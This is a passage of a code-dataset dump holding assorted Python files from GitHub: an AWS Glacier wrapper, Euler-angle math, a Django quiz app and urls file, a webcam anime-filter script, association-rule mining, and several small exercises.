numbers = [str(number) for number in range(lower_limit, upper_limit + 1)]\n return [number for number in numbers if number == number[::-1]]\n\n\ndef get_all_digits(text: str):\n \"\"\"На вхід програмі подається текст.\n :return список цифр з тексту\"\"\"\n return [symbol for symbol in text if symbol.isdigit()]\n","repo_name":"MarkoYaminsky/giraffe-lessons","sub_path":"lessons/lists_pt2/іванка.py","file_name":"іванка.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20467347396","text":"import logging\nfrom boto.glacier.layer2 import Layer2\nimport time\n\n\nclass Amazon:\n def __init__(self, aws_access_key_id, aws_secret_access_key, region_name):\n self.log = logging.getLogger('__main__')\n logging.getLogger('boto').setLevel(logging.CRITICAL)\n self.glacier_client = Layer2(aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key,\n region_name=region_name)\n\n def upload_file(self, vault_name, description, path):\n if self.is_vault_exist(vault_name):\n vault = self.glacier_client.get_vault(vault_name)\n else:\n vault = self.create_vault(vault_name)\n archive_id = vault.concurrent_create_archive_from_file(path, description, part_size=4194304)\n self.log.debug('File \"{0}\" upload successful. Archive id: \"{1}\"'.format(path, archive_id))\n return archive_id\n\n def create_vault(self, vault_name):\n vault = self.glacier_client.create_vault(name=vault_name)\n return vault\n\n def is_vault_exist(self, vault_name):\n vaults = [i.name for i in self.glacier_client.list_vaults()]\n if vault_name in vaults:\n return True\n else:\n return False\n\n def get_inventory(self, vault_name, sleep_interval=1200):\n vault = self.glacier_client.get_vault(vault_name)\n inventory_job_id = vault.retrieve_inventory()\n job = vault.get_job(inventory_job_id)\n while not job.completed:\n time.sleep(sleep_interval)\n job = vault.get_job(inventory_job_id)\n inventory = job.get_output()\n return inventory\n\n def download_file(self, vault_name, archive_id, dest, sleep_interval=1200):\n vault = self.glacier_client.get_vault(vault_name)\n job = vault.retrieve_archive(archive_id)\n job_id = job.id\n while not job.completed:\n time.sleep(sleep_interval)\n job = vault.get_job(job_id)\n download_result = job.download_to_file(dest)\n return download_result\n\n def delete_archive(self, vault_name, archive_id):\n vault = self.glacier_client.get_vault(vault_name)\n vault.delete_archive(archive_id)\n self.log.debug('Successfuly remove archive \"{0}\" from vault \"{1}\"'.format(archive_id, vault.name))\n","repo_name":"vault-the/ebt","sub_path":"ebt_cloud/amazon.py","file_name":"amazon.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"37339428294","text":"\"\"\"\nCourtesy of https://github.com/matthew-brett/transforms3d\nBlender doesn't allow instalation of custom module, so I had to copy\n\"\"\"\nimport math\n\nimport numpy as np\n\n# Not my code\n# pylint: disable=invalid-name\n\n_NEXT_AXIS = [1, 2, 0, 1]\n\n_AXES2TUPLE = {\n \"sxyz\": (0, 0, 0, 0),\n \"sxyx\": (0, 0, 1, 0),\n \"sxzy\": (0, 1, 0, 0),\n \"sxzx\": (0, 1, 1, 0),\n \"syzx\": (1, 0, 0, 0),\n \"syzy\": (1, 0, 1, 0),\n \"syxz\": (1, 1, 0, 0),\n \"syxy\": (1, 1, 1, 0),\n \"szxy\": (2, 0, 0, 0),\n \"szxz\": (2, 0, 1, 0),\n \"szyx\": (2, 1, 0, 0),\n \"szyz\": (2, 1, 1, 0),\n \"rzyx\": (0, 0, 0, 1),\n \"rxyx\": (0, 0, 1, 1),\n \"ryzx\": (0, 1, 0, 1),\n \"rxzx\": (0, 1, 1, 1),\n \"rxzy\": (1, 0, 0, 1),\n \"ryzy\": (1, 0, 1, 1),\n \"rzxy\": (1, 1, 0, 1),\n \"ryxy\": (1, 1, 1, 1),\n \"ryxz\": (2, 0, 0, 1),\n \"rzxz\": (2, 0, 1, 1),\n \"rxyz\": (2, 1, 0, 1),\n \"rzyz\": (2, 1, 1, 1),\n}\n\n_TUPLE2AXES = dict((v, k) for k, v in _AXES2TUPLE.items())\n\n\ndef euler2mat(ai, aj, ak, axes=\"sxyz\"):\n \"\"\"Return rotation matrix from Euler angles and axis sequence.\n\n Parameters\n ----------\n ai : float\n First rotation angle (according to `axes`).\n aj : float\n Second rotation angle (according to `axes`).\n ak : float\n Third rotation angle (according to `axes`).\n axes : str, optional\n Axis specification; one of 24 axis sequences as string or encoded\n tuple - e.g. ``sxyz`` (the default).\n\n Returns\n -------\n mat : array-like shape (3, 3) or (4, 4)\n Rotation matrix or affine.\n\n Examples\n --------\n >>> R = euler2mat(1, 2, 3, 'syxz')\n >>> np.allclose(np.sum(R[0]), -1.34786452)\n True\n >>> R = euler2mat(1, 2, 3, (0, 1, 0, 1))\n >>> np.allclose(np.sum(R[0]), -0.383436184)\n True\n \"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes]\n except (AttributeError, KeyError):\n _TUPLE2AXES[axes] # validation\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i + parity]\n k = _NEXT_AXIS[i - parity + 1]\n\n if frame:\n ai, ak = ak, ai\n if parity:\n ai, aj, ak = -ai, -aj, -ak\n\n si, sj, sk = math.sin(ai), math.sin(aj), math.sin(ak)\n ci, cj, ck = math.cos(ai), math.cos(aj), math.cos(ak)\n cc, cs = ci * ck, ci * sk\n sc, ss = si * ck, si * sk\n\n M = np.eye(3)\n if repetition:\n M[i, i] = cj\n M[i, j] = sj * si\n M[i, k] = sj * ci\n M[j, i] = sj * sk\n M[j, j] = -cj * ss + cc\n M[j, k] = -cj * cs - sc\n M[k, i] = -sj * ck\n M[k, j] = cj * sc + cs\n M[k, k] = cj * cc - ss\n else:\n M[i, i] = cj * ck\n M[i, j] = sj * sc - cs\n M[i, k] = sj * cc + ss\n M[j, i] = cj * sk\n M[j, j] = sj * ss + cc\n M[j, k] = sj * cs - sc\n M[k, i] = -sj\n M[k, j] = cj * si\n M[k, k] = cj * ci\n return M\n","repo_name":"pehala/animationCombiner","sub_path":"animationCombiner/utils/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"45142034227","text":"S = str(input())\n\nfor i in range(97,123) :\n print(S.find(chr(i)),end = \" \")\n \n## find() 와 index()\n\n## 공통점\n##'변수. find(찾을 문자)' / '변수. index(찾을 문자)' \n\n## 차이점\n## find() 는 찾는 문자가 없는 경우에 -1을 출력한다.\n## index() 는 찾는 문자가 없는 경우에 ValueError 에러가 발생한다.\n","repo_name":"kwonhyeongju/Baekjoon_Python","sub_path":"백준/Bronze/05.문자열/10809. 알파벳 찾기 ##/알파벳 찾기.py","file_name":"알파벳 찾기.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25906807151","text":"# -*-coding:utf-8-*-\nfrom forum import models\nfrom django.contrib.auth.models import Group\n\n\nclass TopicsNavItems:\n items = {\n 'default': '默认',\n 'newest': '最新',\n 'best': '精品',\n 'inner_task': '版务',\n 'rank_list': '排行',\n 'rank_user': '人物',\n 'users': '成员',\n 'update': '刷新',\n 'new': '发帖',\n }\n\n def __str__(self):\n return self.items\n\n\nclass TopicsTableHeader:\n header = {\n 'title': '标题',\n 'author': '作者',\n 'access_count': '点击',\n 'reply_count': '回复',\n 'created_at': '创建时间',\n }\n\n def __str__(self):\n return self.header\n\n\ndef topic_get_reply_count(topic):\n messages = models.ForumMessage.objects.filter(topic=topic)\n return len(messages)\n","repo_name":"chindragon/redot.repository","sub_path":"redot/forum/blocks/topicclass.py","file_name":"topicclass.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8015194826","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n d = {}\n count = 0\n while head:\n if head in d:\n return head\n else:\n d[head] = count\n count += 1\n head = head.next\n return None\n ","repo_name":"Panfil-spb/LeetCode","sub_path":"142-linked-list-cycle-ii/142-linked-list-cycle-ii.py","file_name":"142-linked-list-cycle-ii.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27043743816","text":"from __future__ import annotations\n\nimport pygame as pg\nfrom ..assets.sprites import Sprite\n\n\nclass Player:\n \"\"\"\n Implement a player in the game using Verlet's integration.\n \"\"\"\n def __init__(self, sprite: Sprite, pos: pg.Vector2):\n self.sprite = sprite\n self.pos = pos\n self.old_pos = self.pos.copy()\n self.gravity = pg.Vector2(0, 10)\n\n @property\n def pos(self) -> pg.Vector2:\n return self.sprite.pos\n\n @pos.setter\n def pos(self, value: pg.Vector2):\n self.sprite.pos = value\n\n @property\n def rect(self):\n return self.sprite.rect\n\n @rect.setter\n def rect(self, value: pg.Rect):\n self.sprite.rect = value\n\n def flip_pos(self):\n old_pos = self.pos.copy()\n self.pos = self.pos + (self.pos - self.old_pos)\n self.old_pos = old_pos\n\n def update(self, dt: float):\n self.flip_pos()\n self.pos = self.pos + (self.gravity * dt)\n self.sprite.step_by(int(dt))\n\n def draw(self, screen: pg.Surface, camera: pg.Vector2 | None = None):\n self.sprite.draw(screen, camera)\n\n def stop(self):\n self.old_pos = self.pos.copy()\n\n def resolve_collision(self, other: pg.Rect) -> tuple[bool, int]:\n if not self.rect.colliderect(other):\n return False, -1\n\n left_fix = other.left - self.rect.right + 1\n right_fix = self.rect.left - other.right - 1\n top_fix = other.top - self.rect.bottom + 1\n bottom_fix = self.rect.top - other.bottom - 1\n fix = min((left_fix, 0), (top_fix, 1), (right_fix, 2), (bottom_fix, 3), key=lambda x: abs(x[0]))\n if fix[1] == 0:\n self.pos.x += fix[0]\n elif fix[1] == 1:\n self.pos.y += fix[0]\n elif fix[1] == 2:\n self.pos.x -= fix[0]\n elif fix[1] == 3:\n self.pos.y -= fix[0]\n\n return True, fix[1]\n\n\n__all__ = [\"Player\"]\n","repo_name":"gresm/pygame-summer-2022","sub_path":"game/environment/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28773472999","text":"a = int(input())\ni = 0\nsum = 0\n# for i in range(0,a):\n# i += 1\n# sum += i\n# if sum >= a:\n# print(sum)\n# break\nwhile True:\n i += 1\n sum += i\n if sum >= a:\n break\nprint(sum)","repo_name":"jinjaehyuk/codeup100","sub_path":"6086.py","file_name":"6086.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1438136685","text":"from oslo_config import cfg\n\n\nexecutor_opts = [\n cfg.StrOpt('agent_trigger_metadata_key',\n default='kongming-vcpu-pinning',\n help='The key to be used to informing kongming for '\n 'vcpu pinning'),\n cfg.IntOpt('update_resources_interval',\n default=60,\n help=_('Interval between syncing the resources from underlying '\n 'hypervisor, in seconds.')),\n]\n\n\ndef register_opts(conf):\n conf.register_opts(\n executor_opts, group=\"agent\")\n","repo_name":"ZhengZhenyu/KongMing","sub_path":"kongming/conf/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"8623263941","text":"import os\nimport json\nimport re\n\n__all__ = ['readexif', 'decode_duration', 'format_duration', 'create_video_thumbnail']\n\n\ndef readexif( f, tags ):\n tags = \" \".join([\"-%s\" % t for t in tags])\n cmd = '/usr/bin/exiftool -j -f %s \"%s\"' % (tags, f)\n\n p = os.popen(cmd, \"r\")\n l = p.readlines()\n exifoutput = \"\".join(l)\n\n metadata = json.loads(exifoutput)\n return metadata[0]\n\ndurationpattern = re.compile(r\"([0-9]+:)*[0-9]+(\\.[0-9]+)?\")\n\n\ndef decode_duration( s ):\n if s:\n m = durationpattern.search( s )\n\n if m:\n t = m.group(0).split(\".\")\n if len(t) > 1:\n frames = int(t[1])\n else:\n frames = 0\n ls = t[0].split(\":\")\n ls = [int(l) for l in ls]\n ls.reverse()\n\n secs = 0\n f = 1\n for l in ls:\n secs += l * f\n f = f * 60\n\n return (secs, int(frames))\n\n return None\n\n\ndef format_duration( secs ):\n tmp = secs\n secs = tmp % 60\n tmp = (tmp - secs) / 60\n mins = tmp % 60\n hours = (tmp - mins) / 60\n\n return \"%0*d:%0*d:%0*d\" % (2, hours, 2, mins, 2, secs)\n\n\ndef create_video_thumbnail( vidfile, duration, output='', name=None ):\n (_root, f) = os.path.split(vidfile)\n (base, _ext) = os.path.splitext(f)\n\n if name:\n outputfile = os.path.join(output, name + \".png\")\n else:\n outputfile = os.path.join(output, base + \".png\")\n cmd = 'ffmpeg -i \"%s\" -r 1 -ss %s -t 00:00:01 -f image2 \"%s\"' % (vidfile, 1 if duration <= 10 else 10, outputfile )\n p = os.popen(cmd, \"r\")\n p.readlines()\n\n return outputfile\n","repo_name":"djangoplicity/djangoplicity","sub_path":"djangoplicity/utils/videothumbnails.py","file_name":"videothumbnails.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"25070080058","text":"def quicksort(array):\n if len(array)<2:\n return array\n else:\n pivo = array[0]\n smaller_numbers = [i for i in array[1:] if i <= pivo]\n bigger_number = [i for i in array[1:] if i > pivo]\n return (quicksort(smaller_numbers)) + [pivo] + (quicksort(bigger_number))\n\narray = [ 4, 6, 6, 33, 60, 2, 10, 9] \nprint (quicksort(array))\n\n\n\ndef bubblesort(array, n):\n aux = 1\n while(aux):\n aux = 0\n for i in range(n-1):\n if array[i] > array[i+1]:\n array[i], array[i+1] = array[i+1], array[i]\n aux = 1\n\n return array\narr = [1, 33, 11, 22, 9, 0, 34, 12]\nbubble = bubblesort(arr, len(arr) )\nprint(bubble)\n\n \n\n","repo_name":"AriRVasc/EntendendoAlgoritmos","sub_path":"Quicksort/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42574033797","text":"import tkinter as tk\nimport start_page as sp\nfrom languages import IP_BACK, IP_INFO, LANG\n\n\nclass InfoPage(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n label_info = tk.Label(self, text=IP_INFO[LANG])\n label_info.pack()\n back_btn = tk.Button(self, text=IP_BACK[LANG], command=lambda: controller.show_frame(sp.StartPage))\n back_btn.pack(side=\"bottom\")","repo_name":"Phantomo/measuring_instrument","sub_path":"info_page.py","file_name":"info_page.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36329462325","text":"from django.urls import reverse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Quiz, QuizQuestion, ImageChoice, TextChoice , TextInputQuestion\n\ndef quiz_list(request):\n quizzes = Quiz.objects.all()\n context = {'quizzes': quizzes}\n return render(request, 'quiz_list.html', context)\n\ndef question_quiz_list(request, quiz_id):\n quiz = get_object_or_404(Quiz, pk=quiz_id)\n questions = QuizQuestion.objects.filter(quiz=quiz)\n\n # loop through the questions and retrieve their choices\n for question in questions:\n image_choices = question.imagechoice_set.all()\n text_choices = question.textchoice_set.all()\n text_input_question = question.textinputquestion_set.all()\n\n\n # check if the question has image choices\n if image_choices:\n question.has_image_choices = True\n question.choices = image_choices\n else:\n question.has_image_choices = False\n\n # check if the question has text choices\n if text_choices:\n question.has_text_choices = True\n question.text_choices = text_choices\n else:\n question.has_text_choices = False\n\n # check if the question has text input choices\n if text_input_question:\n question.has_text_input_question = True\n question.text_input_question = text_input_question\n else:\n question.has_text_input_question = False \n\n context = {'questions': questions, 'quiz': quiz}\n return render(request, 'question_quiz_list.html', context)\n\n\n\ndef result(request, quiz_id):\n quiz = get_object_or_404(Quiz, pk=quiz_id)\n questions = QuizQuestion.objects.filter(quiz=quiz)\n\n user_responses = {}\n score = 0\n\n if request.method == 'POST':\n for question in questions:\n user_response = request.POST.get('question_{}'.format(question.id))\n user_responses[question.id] = user_response\n if question.question_type == 'image_choice':\n correct_choice = ImageChoice.objects.filter(question=question, is_correct=True).first()\n if correct_choice is not None and user_response == str(correct_choice.id):\n score += question.score\n if question.question_type == 'text_choice':\n correct_choice = TextChoice.objects.filter(question=question, is_correct=True).first()\n if correct_choice is not None and user_response == str(correct_choice.id):\n score += question.score\n if question.question_type == 'textinputquestion':\n correct_answer = TextInputQuestion.objects.get(question=question, is_correct=True)\n if user_response.lower() == correct_answer.answer_text.lower():\n score += question.score\n context = {'user_responses': user_responses, 'quiz': quiz, 'score': score, 'total_questions': len(questions)}\n return render(request, 'result.html', context)\n else:\n for question in questions:\n if isinstance(question, TextInputQuestion):\n question.field_name = 'question_{}'.format(question.id)\n else:\n choices = []\n image_choices = question.imagechoice_set.all()\n text_choices = question.textchoice_set.all()\n if image_choices.exists():\n for choice in image_choices:\n choices.append({'id': choice.id, 'image': choice.image.url, 'is_correct': choice.is_correct})\n elif text_choices.exists():\n for choice in text_choices:\n choices.append({'id': choice.id, 'text': choice.text, 'is_correct': choice.is_correct})\n question.choices = choices\n\n return render(request, 'question_quiz_list.html', {'quiz': quiz, 'questions': questions})\n","repo_name":"Nabilox101/myquiz","sub_path":"quiz/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2245222831","text":"\"\"\"\n\n Der fabuloese TikkleMod\n\n - Ein-/Auslog-Phrase [x]\n - AFK-Phrase [x]\n - Fetch tikkles [x]\n\n\"\"\"\n\nimport re\nimport datetime\n\n__version__ = \"0.1a\"\n__requires__ = []\n\n\ntikkleView = chaos(\"tikkleTIKKLE\",\n \"\"\"\n if (doc.doctype == \"tikkle\") {\n emit(doc.to, [doc.from, doc.msg, doc._rev, doc.time]);\n }\n \"\"\"\n)\ntikkleIdentityView = chaos(\"tikkleIdentityView\",\n \"\"\"\n if (doc.doctype == \"Identity\") {\n emit(\"User\", doc.name);\n }\n \"\"\"\n)\n\n@hook('message')\n@defer.inlineCallbacks\ndef startTheTikkleFun(event):\n if (hasIdentity(event)):\n d = davenport.openDoc(str(event.source.identity.docid))\n doc = yield d\n if \"tikkle\" in doc: #XXX the database could do that for us *sigh*\n loginRE = re.compile(doc[\"tikkle\"][\"login\"])\n if (loginRE.match(event.content) != None):\n event.source.message(\"User recognized - Digests!\")\n doStuff(event)\n\ndef doStuff(event):\n fetchTikkles(event)\n\n@defer.inlineCallbacks\ndef fetchTikkles(event):\n entries = yield tikkleView(key=event.source.identity.docid)\n for entry in entries[u'rows']:\n senderDoc = davenport.openDoc(str(entry[u'value'][0]))\n senderDoc = yield senderDoc\n mtime = datetime.datetime.fromtimestamp(entry[u'value'][3]).strftime(\"[%d.%m|%H:%M]\")\n event.source.message(mtime+\" <\"+str(senderDoc[u'name']+\"> \"+entry[u'value'][1]))\n davenport.deleteDoc(str(entry[u'id']), str(entry[u'value'][2]))\n\n## Send Messages\n@hook('message',expr='^tikkle tikkle .*')\n@defer.inlineCallbacks\ndef sendMsg(event):\n # msg = [tikkle, tikkle, , ]\n msg = event.content.split(' ')\n if ((msg[1] == \"tikkle\") and (hasIdentity(event))):\n sent = False\n tikkle = {}\n users = yield tikkleIdentityView()\n for user in users[u'rows']:\n if (str(user[u'value']) == msg[2]):\n tikkle[\"time\"] = int(datetime.datetime.now().strftime(\"%s\"))\n tikkle[\"from\"] = event.source.identity.docid\n tikkle[\"to\"] = user[u'id']\n tikkle[\"msg\"] = \" \".join(msg[3:])\n tikkle[\"doctype\"] = \"tikkle\"\n davenport.saveDoc(tikkle)\n #print \"[TIKKLE] SENT MESSAGE: \"+str(tikkle)\n #event.reply(\"Brief: \"+str(tikkle))\n sent = True\n break\n if sent:\n event.source.message(\"Message successfully sent!\")\n else:\n event.source.message(\"Message could not be sent!\")\n\ndef hasIdentity(event):\n return event.source.identity is not None\n","repo_name":"lehmannro/pyhkal2","sub_path":"contrib/tikkle.py","file_name":"tikkle.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"13244864173","text":"# pip install mss pyvirtualcam facenet_pytorch pykalman\nimport io\nimport signal\nimport time\n\nimport torch\nimport numpy as np\nimport cv2\nimport os\nimport sys\n\n\nfrom PIL import Image, ImageDraw\n\nfrom mss import mss\nimport pyvirtualcam\n\nfrom pykalman import KalmanFilter\n\nimport rembg.bg as bg\n\n# Local libs.\nimport detection\nimport anime_gan\nimport facetracking\n\nfrom pyxelate import Pyx\nimport skimage\n\n# define a video capture object\n\n\n# frame = cv2.imread(\"c:/Users/Brian/Downloads/wallace.jpg\")\n# if frame is None:\n# print(\"nope\")\n# sys.exit(1)\n# else:\n# print(\"yep\")\n\n\ndef track_faces(frame, face_observations):\n\n boxes = facetracking.detect_faces(frame)\n\n if boxes is not None and len(boxes) != 0:\n\n round_to = 1\n [x1, y1, x2, y2] = [\n int(round(x / round_to) * round_to) for x in boxes[0].tolist()\n ]\n\n percent = 0.5\n\n width = x2 - x1\n height = y2 - y1\n x1 = max(0, x1 - width * percent)\n x2 = min(frame.shape[1], x2 + width * percent)\n y1 = max(0, y1 - height * percent)\n y2 = min(frame.shape[0], y2 + height * percent)\n coords = [x1, y1, x2, y2]\n\n face_observations.append(coords)\n\n\ndef crop_face(frame):\n global face_observations\n\n try:\n face_observations\n except NameError:\n face_observations = []\n\n track_faces(frame, face_observations)\n\n # If we have a face go to that, otherwise display the entire image.\n if len(face_observations) != 0:\n obs_to_average = 5\n face_observations = face_observations[-obs_to_average:]\n [x1, y1, x2, y2] = [int(x) for x in np.average(face_observations, axis=0)]\n\n # Crop it.\n frame = frame[y1:y2, x1:x2]\n\n return frame\n\n\ndef frame_from_video(path):\n global vid_cap\n\n try:\n vid_cap\n except NameError:\n vid_cap = cv2.VideoCapture(path)\n\n if not vid_cap.isOpened():\n return None\n\n ret, frame = vid_cap.read()\n if ret:\n return frame\n return None\n\n\ndef pixelate(frame):\n global pyx_transformer\n\n downsample_by = 2 # new image will be 1/14th of the original in size\n palette = 11 # find 7 colors\n image = frame[:, :, ::-1]\n\n try:\n pyx_transformer\n except NameError:\n pyx_transformer = Pyx(factor=downsample_by, palette=palette)\n # Learn color palette\n pyx_transformer.fit(image)\n\n new_image = pyx_transformer.transform(image)\n cv_image = skimage.img_as_ubyte(new_image)\n cv_image = cv2.cvtColor(cv_image, cv2.COLOR_RGB2BGR)\n return cv_image\n\n\ndef write_frame_to_video(frame, path):\n global video_writer\n\n try:\n video_writer\n except NameError:\n video_writer = cv2.VideoWriter(\n path, cv2.VideoWriter_fourcc(*\"MJPG\"), 30, (frame.shape[1], frame.shape[0])\n )\n\n video_writer.write(frame)\n\n\ndef frame_from_web_cam():\n\n global vid\n\n try:\n vid\n except NameError:\n # Open the webcam.\n vid = cv2.VideoCapture(0)\n print(\"Using webcam\")\n\n ret, frame = vid.read()\n\n return frame\n\n\ndef frame_from_screen_cap(x, y, width, height):\n\n # # Screen capture.\n with mss() as sct:\n monitor = {\n \"top\": int(x),\n \"left\": int(y),\n \"width\": int(width),\n \"height\": int(height),\n }\n frame = np.array(sct.grab(monitor))\n # Remove the alpha channel.\n frame = frame[:, :, :3]\n return frame\n\n\ndef calculate_fps():\n global frame_counter, last_time\n\n try:\n frame_counter\n\n except NameError:\n frame_counter = 0\n last_time = time.time()\n\n frame_counter += 1\n if frame_counter % 10 == 0:\n\n print(\"fps: \", frame_counter / (time.time() - last_time))\n frame_counter = 0\n last_time = time.time()\n\n\ndef dump_frame_to_obs_virtual_cam(frame):\n global virtual_cam\n\n height, width, layers = frame.shape\n\n # Make the webcam be bigger.\n width = width * 2\n height = height * 2\n\n try:\n virtual_cam\n except NameError:\n\n print(\"Make sure you're running OBS!\")\n\n virtual_cam = pyvirtualcam.Camera(width=width, height=height, fps=30)\n print(f\"Using virtual camera: {virtual_cam.device}\")\n\n updated_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n updated_frame = cv2.resize(updated_frame, (height, width))\n\n virtual_cam.send(updated_frame)\n virtual_cam.sleep_until_next_frame()\n\n\ndef cleanup(signum=None, frame=None):\n \"\"\"\n Cleanup when we send C-c\n \"\"\"\n\n try:\n virtual_cam.close()\n except:\n pass\n vid.release()\n cv2.destroyAllWindows()\n print(\"Cleanup complete\")\n\n\ndef scale_frame_to_width(frame, new_width, interpolation=cv2.INTER_NEAREST):\n height, width, layers = frame.shape\n\n aspect_ratio = float(width) / height\n\n new_height = int(new_width / aspect_ratio)\n return cv2.resize(frame, (new_width, new_height), interpolation=interpolation)\n\n\nsignal.signal(signal.SIGINT, cleanup)\n\nwhile True:\n\n calculate_fps()\n\n # Capture the video frame by frame\n\n frame = frame_from_web_cam()\n # frame = frame_from_screen_cap(0, 0, 1024, 1400)\n # frame = frame_from_video(\"c:/Users/Brian/Downloads/foo.mp4\")\n\n frame = crop_face(frame)\n\n frame = anime_gan.anime(frame)\n\n # frame = pixelate(frame)\n frame = scale_frame_to_width(frame, 1000)\n\n # dump_frame_to_obs_virtual_cam(frame)\n # write_frame_to_video(frame, \"c:/Users/Brian/Downloads/out.avi\")\n\n cv2.imshow(\"frame\", frame)\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n break\n\n\ncleanup()\n","repo_name":"brian-dawn/anime-gan-v2-playground","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36577154837","text":"import os\n\nimport numpy as np\nimport pandas as pd\nfrom mlxtend.frequent_patterns import apriori, association_rules, fpgrowth\n\n#directory name of the output file\ndirname = 'output'\n\n\"\"\" Answer to Question 1 \"\"\"\n \n#read the csv file\ndata = pd.read_csv('./specs/gpa_question1.csv')\n\n#Filter out the count attribute\ndata.pop('count')\n\n#convert the data set into the form that is required by the apriori algorithm\ndummies_out = pd.get_dummies(data)\n\n\n# using apriori algorithm calculate the frequent itemset using minimum support as 15%\n# use_colnames attribute in apriori will use the same columns in frequent dataset output as in input dataset.\nfrequent_itemset = apriori(dummies_out, min_support=0.15,use_colnames=True)\n\n\n# check if the output folder is present, if not create output folder\nif not os.path.exists(dirname):\n os.mkdir(dirname)\n\n#write the output to output file\nfrequent_itemset.to_csv('./output/question1_out_apriori.csv',index=False)\n\n\n# calculate the association rules based on confidence.\n#confidence is set to 90%\nrules_9 = association_rules(frequent_itemset, metric=\"confidence\", min_threshold=0.9)\n\nrules_9.to_csv('./output/question1_out_rules9.csv',index=False)\n\n# confidence is set to 70%\nrules_7 = association_rules(frequent_itemset, metric=\"confidence\", min_threshold=0.7)\n\nrules_7.to_csv('./output/question1_out_rules7.csv',index=False)\n\n\n\n\"\"\" Answer to Question 2 \"\"\"\n\n#read the csv file\ndata_2 = pd.read_csv('./specs/bank_data_question2.csv')\n\n# filter out the id attribute\ndata_2.pop('id')\n\n# only get those columns that contain numeric data.\nnumeric_data = data_2._get_numeric_data()\n\n# initialize a new dataframe\ndata_1 = pd.DataFrame()\n\n# using pandas cut method to discretise the numeric data in equal width\nfor i in numeric_data:\n data_1[i] = pd.cut(numeric_data[i],3)\n\n# update the original dataframe to contain the discretised data after binning\ndata_2.update(data_1,overwrite=True)\n\n# convert the data in the form to be used by fpgrowth algorithm.\ndummies_out = pd.get_dummies(data_2)\n\n#apply the fp growth algorthm to calculate the frequent itemsets.\noutput = fpgrowth(dummies_out, min_support=0.2,use_colnames=True)\n\noutput.to_csv('./output/question2_out_fpgrowth.csv',index = False)\n\n#calculate the association rules \n#79% percentage is the confidence where atleast 10 rules are genearated. \nrules = association_rules(output, metric=\"confidence\", min_threshold=0.70)\n\nrules.to_csv('./output/question2_out_rules.csv',index=False)\n","repo_name":"akshaymodi9/data-mining","sub_path":"practicals/practical_3_ASSOCIATION/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28705770921","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nhandler404 = 'trainingApp.errors.error404'\nhandler500 = 'trainingApp.errors.error500'\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'trainingProject.views.home', name='home'),\n # url(r'^trainingProject/', include('trainingProject.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n)\n\nurlpatterns += patterns('trainingApp.views',\n url(r'^$', 'posts', name='pageHome'),\n url(r'^posts/$', 'posts', name='pagePosts'),\n url(r'^post/(?P[\\w-]+).html$', 'post', name='pagePost'),\n url(r'^category/(?P[\\w-]+).html$', 'category', name='pageCategory'),\n url(r'^profile/(?P[\\w-]+).html$', 'profile', name='pageProfile'),\n url(r'^settings/$', 'settings', name='pageSettings'),\n url(r'^signUp/$', 'signUp', name='pageSignUp'),\n url(r'^signIn/$', 'signIn', name='pageSignIn'),\n url(r'^signOut/$', 'signOut', 